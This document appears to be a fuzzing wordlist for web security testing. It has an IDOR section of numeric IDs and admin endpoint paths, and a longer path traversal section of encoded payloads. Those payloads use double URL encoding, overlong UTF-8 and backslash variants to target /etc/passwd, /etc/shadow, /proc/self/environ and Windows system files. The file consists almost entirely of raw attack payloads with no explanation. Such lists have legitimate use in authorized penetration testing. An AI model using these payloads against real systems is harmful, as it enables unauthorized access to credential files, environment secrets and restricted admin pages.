# ── IDOR numeric IDs
1
2
3
100
1000
0
-1
99999
/api/users/1
/api/users/2
/api/admin/
/admin
/administrator
/admin.php
/admin/index.php
/admin/login
/dashboard
/control-panel
/manage
/management
/superuser

# ── Path Traversal
../
../../
../../../
../../../../
../../../../../
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/passwd
..%2Fetc%2Fpasswd
..%252Fetc%252Fpasswd
..%c0%afetc%c0%afpasswd
..%c1%9cetc%c1%9cpasswd
....//....//etc/passwd
....\/....\/etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
..//..//..//etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/proc/self/environ
/proc/self/cmdline
C:\Windows\win.ini
C:\boot.ini
C:\Windows\System32\drivers\etc\hosts
..\..\..\..\Windows\win.ini
..\..\..\Windows\win.ini
%5c..%5c..%5c..%5cWindows%5cwin.ini
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f
%5c..%5c..%5cWindows%5cwin.ini
%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%5c..%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts